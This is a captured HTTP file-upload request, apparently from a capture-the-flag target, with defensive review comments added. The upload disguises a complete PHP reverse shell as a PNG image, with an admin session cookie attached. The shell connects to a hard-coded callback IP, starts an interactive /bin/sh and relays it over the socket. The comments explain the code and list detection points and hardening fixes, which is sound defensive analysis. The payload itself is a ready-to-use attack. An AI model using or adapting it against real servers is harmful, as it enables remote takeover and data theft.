  1. POST / HTTP/1.1
  2. Host: 138.68.187.191:1337
  3. User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
  4. Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  5. Accept-Language: en-US,en;q=0.5
  6. Accept-Encoding: gzip, deflate
  7. Referer: http://138.68.187.191:1337/
  8. Content-Type: multipart/form-data; boundary=---------------------------20501827029678
  9. Content-Length: 3965
  10. Connection: keep-alive
  11. Cookie: session=eyJ1c2VybmFtZSI6ImFkbWluIn0.XLCPLQ.YxytijoFlpOqpx74Wzd_Q5TtucU
  12. Upgrade-Insecure-Requests: 1
  13.  
  14. -----------------------------20501827029678
  15. Content-Disposition: form-data; name="file"; filename="payload.png"
  16. Content-Type: image/png
  17.  
  18. .PNG
  19. .
  20. ...
  21. IHDR... ... ............ pHYs..........+.....`IDATH.c\<?<?php
  22.  
  23. <?php
  // NOTE(review): this script is the body of the multipart "file" part of the request
  // above (filename="payload.png", Content-Type: image/png, PNG header bytes before
  // the `<?php` tag). The wrapper makes the upload look like an image to a check that
  // reads only the declared type or the leading magic bytes. Defender-side fixes for
  // that class of upload handling are: re-encode images rather than storing the
  // original bytes, keep uploads out of any interpreter-served path, and serve the
  // upload directory with script execution disabled. Whether this upload actually
  // ran is NOT shown by the capture -- the server only answered with the 302 below.
  //
  // The request also carries a session cookie whose first segment base64-decodes
  // to a JSON object with username "admin" (the Server header names Werkzeug, so
  // this is presumably a Flask-style signed session) -- i.e. the upload was made
  // with a privileged session; how that session was obtained is not on this page.
  //
  // What the script does: it opens an outbound TCP connection to $ip:$port, starts
  // $shell under proc_open, and then copies bytes between the socket and the
  // child's stdin/stdout/stderr until either side closes. Host/network signals
  // worth alerting on: a web-server worker making an outbound connection to a
  // non-standard port, and a /bin/sh child of the PHP worker process.
  24.  
  25. set_time_limit (0);
  26. $VERSION = "1.0";
  // Callback address and port the shell connects *out* to; the listener lives at
  // the attacker's end. In a capture like this these two values are the primary
  // network indicator to block and hunt for.
  27. $ip = '34.242.79.196'; // CHANGE THIS
  28. $port = 1234; // CHANGE THIS
  // Maximum bytes moved per fread() in the pump loop below.
  29. $chunk_size = 1400;
  // stream_select() is only ever asked about readability; write/error sets stay null.
  30. $write_a = null;
  31. $error_a = null;
  // Command line handed to proc_open: host fingerprint (uname/w/id) then an
  // interactive sh whose stdio is wired to the socket.
  32. $shell = 'uname -a; w; id; /bin/sh -i';
  33. $daemon = 0;
  34. $debug = 0;
  35.  
  36. //
  37. // Daemonise ourself if possible to avoid zombies later
  38. //
  39.  
  40. // pcntl_fork is hardly ever available, but will allow us to daemonise
  41. // our php process and avoid zombies. Worth a try...
  // Fork + setsid + parent exit detaches the shell from the worker that served
  // the request, presumably so it outlives the HTTP request; if pcntl/posix are
  // not compiled in (a common hardening choice: disable_functions), this whole
  // branch is skipped and the shell stays a child of the worker.
  42. if (function_exists('pcntl_fork')) {
  43. // Fork and have the parent process exit
  44. $pid = pcntl_fork();
  45.  
  46. if ($pid == -1) {
  47. printit("ERROR: Can't fork");
  48. exit(1);
  49. }
  50.  
  51. if ($pid) {
  52. exit(0); // Parent exits
  53. }
  54.  
  55. // Make the current process a session leader
  56. // Will only succeed if we forked
  57. if (posix_setsid() == -1) {
  58. printit("Error: Can't setsid()");
  59. exit(1);
  60. }
  61.  
  62. $daemon = 1;
  63. } else {
  64. printit("WARNING: Failed to daemonise. This is quite common and not fatal.");
  65. }
  66.  
  67. // Change to a safe directory
  68. chdir("/");
  69.  
  70. // Remove any umask we inherited
  // umask(0) means anything the shell later creates is world-writable by default.
  71. umask(0);
  72.  
  73. //
  74. // Do the reverse shell...
  75. //
  76.  
  77. // Open reverse connection
  // Outbound connect with a 30-second timeout; any failure ends the script, so an
  // egress filter that drops this connection is sufficient to neutralise it.
  78. $sock = fsockopen($ip, $port, $errno, $errstr, 30);
  79. if (!$sock) {
  80. printit("$errstr ($errno)");
  81. exit(1);
  82. }
  83.  
  84. // Spawn shell process
  // Three anonymous pipes: the loop below feeds $pipes[0] from the socket and
  // forwards $pipes[1] / $pipes[2] back to it.
  85. $descriptorspec = array(
  86. 0 => array("pipe", "r"), // stdin is a pipe that the child will read from
  87. 1 => array("pipe", "w"), // stdout is a pipe that the child will write to
  88. 2 => array("pipe", "w") // stderr is a pipe that the child will write to
  89. );
  90.  
  // proc_open is the second choke point after fsockopen: it is on the usual
  // disable_functions list, and its absence also ends the script here.
  91. $process = proc_open($shell, $descriptorspec, $pipes);
  92.  
  93. if (!is_resource($process)) {
  94. printit("ERROR: Can't spawn shell");
  95. exit(1);
  96. }
  97.  
  98. // Set everything to non-blocking
  99. // Reason: Occasionally reads will block, even though stream_select tells us they won't
  100. stream_set_blocking($pipes[0], 0);
  101. stream_set_blocking($pipes[1], 0);
  102. stream_set_blocking($pipes[2], 0);
  103. stream_set_blocking($sock, 0);
  104.  
  // This line, and every other printit() call, ends up on the worker's stdout when
  // the daemonise branch did not run -- see the note on printit() at the bottom --
  // so the literal text "Successfully opened reverse shell to" is a useful string
  // to search for in web-server logs and captured responses.
  105. printit("Successfully opened reverse shell to $ip:$port");
  106.  
  // Pump loop: one iteration per readable stream, exits when the socket or the
  // child's stdout hits EOF.
  107. while (1) {
  108. // Check for end of TCP connection
  109. if (feof($sock)) {
  110. printit("ERROR: Shell connection terminated");
  111. break;
  112. }
  113.  
  114. // Check for end of STDOUT
  115. if (feof($pipes[1])) {
  116. printit("ERROR: Shell process terminated");
  117. break;
  118. }
  119.  
  120. // Wait until a command is sent down $sock, or some
  121. // command output is available on STDOUT or STDERR
  // Timeout null: block indefinitely until at least one of the three is readable.
  // stream_select() rewrites $read_a in place to contain only the ready streams.
  122. $read_a = array($sock, $pipes[1], $pipes[2]);
  123. $num_changed_sockets = stream_select($read_a, $write_a, $error_a, null);
  124.  
  125. // If we can read from the TCP socket, send
  126. // data to process's STDIN
  127. if (in_array($sock, $read_a)) {
  128. if ($debug) printit("SOCK READ");
  129. $input = fread($sock, $chunk_size);
  130. if ($debug) printit("SOCK: $input");
  131. fwrite($pipes[0], $input);
  132. }
  133.  
  134. // If we can read from the process's STDOUT
  135. // send data down tcp connection
  136. if (in_array($pipes[1], $read_a)) {
  137. if ($debug) printit("STDOUT READ");
  138. $input = fread($pipes[1], $chunk_size);
  139. if ($debug) printit("STDOUT: $input");
  140. fwrite($sock, $input);
  141. }
  142.  
  143. // If we can read from the process's STDERR
  144. // send data down tcp connection
  145. if (in_array($pipes[2], $read_a)) {
  146. if ($debug) printit("STDERR READ");
  147. $input = fread($pipes[2], $chunk_size);
  148. if ($debug) printit("STDERR: $input");
  149. fwrite($sock, $input);
  150. }
  151. }
  152.  
  153. fclose($sock);
  154. fclose($pipes[0]);
  155. fclose($pipes[1]);
  156. fclose($pipes[2]);
  157. proc_close($process);
  158.  
  159. // Like print, but does nothing if we've daemonised ourself
  160. // (I can't figure out how to redirect STDOUT like a proper daemon)
  // NOTE(review): $daemon is not declared `global` inside this function, so under
  // PHP's function scoping the $daemon read here is an undefined local, not the
  // script-level flag set above; the guard therefore looks always-true and every
  // message is printed regardless of daemonisation. For a defender that is helpful:
  // the status strings land in the worker's output (and, when the script runs in a
  // request, in the HTTP response body), so they are a detectable artefact.
  161. function printit ($string) {
  162. if (!$daemon) {
  163. print "$string\n";
  164. }
  165. }
  166.  
  // Anything after the closing tag (the trailing PNG bytes in the upload) would be
  // emitted as literal output rather than executed.
  167. ?>
  168.  
  169.  
  170.  
  171.  
  172. ?>X....s^7.....~_.}.'....._..|.00c..g..=..2..Q0
  173. F.(...`...Q0
  174. .
  175. .......x
  176. .....IEND.B`.
  177. -----------------------------20501827029678--
  178. HTTP/1.0 302 FOUND
  179. Content-Type: text/html; charset=utf-8
  180. Content-Length: 209
  181. Location: http://138.68.187.191:1337/
  182. Server: Werkzeug/0.14.1 Python/2.7.15rc1
  183. Date: Sun, 14 Apr 2019 20:20:11 GMT
  184.  
  185. <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
  186. <title>Redirecting...</title>
  187. <h1>Redirecting...</h1>
  188. <p>You should be redirected automatically to target URL: <a href="/">/</a>. If not click the link.